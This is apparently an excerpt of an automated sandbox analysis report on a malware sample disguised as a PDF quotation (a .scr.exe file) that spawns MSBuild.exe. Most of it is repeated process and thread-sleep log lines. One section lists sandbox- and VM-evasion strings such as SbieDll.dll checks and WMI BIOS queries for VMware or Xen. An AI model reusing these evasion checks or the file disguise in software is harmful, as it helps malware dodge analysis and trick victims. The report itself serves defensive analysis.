Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORER?SBIEDLL.DLL@SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREAVERSIONBSERIALNUMBERDVMWARE|VIRTUAL|A M I|XENESELECT * FROM WIN32_COMPUTERSYSTEMFMANUFACTURERGMODELHMICROSOFT|VMWARE|VIRTUALIJOHNJANNAKXXXXXXXX

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory allocated: 13736120000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory allocated: 1374FB70000 memory reserve | memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 250E06C0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 250FA0E0000 memory reserve | memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596843			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596731			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596609			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596500			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596390			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596281			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596171			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596062			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595953			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595843			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595734			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595625			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595515			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595414			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599563			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599438			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599313			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599078			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598969			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598844			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598110			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597996			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597758			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597633			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597516			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597406			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597297			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596969			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596844			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595110			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 1461			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 8356			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1854			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7974			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -23980767295822402s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -100000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7628	Thread sleep count: 1461 > 30			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7628	Thread sleep count: 8356 > 30			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99890s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99782s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99657s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99547s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99438s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99313s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99188s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99063s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98938s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98828s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98718s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98609s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98500s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98391s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98266s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98155s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98047s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97938s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97813s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97688s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97578s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97469s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97328s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97219s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97109s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96891s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96781s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96672s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96563s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96438s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96313s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96188s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596843s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596731s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596609s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596500s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596390s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596281s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596171s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596062s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595953s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595843s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595734s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595625s >= -30000s			Jump to behavior
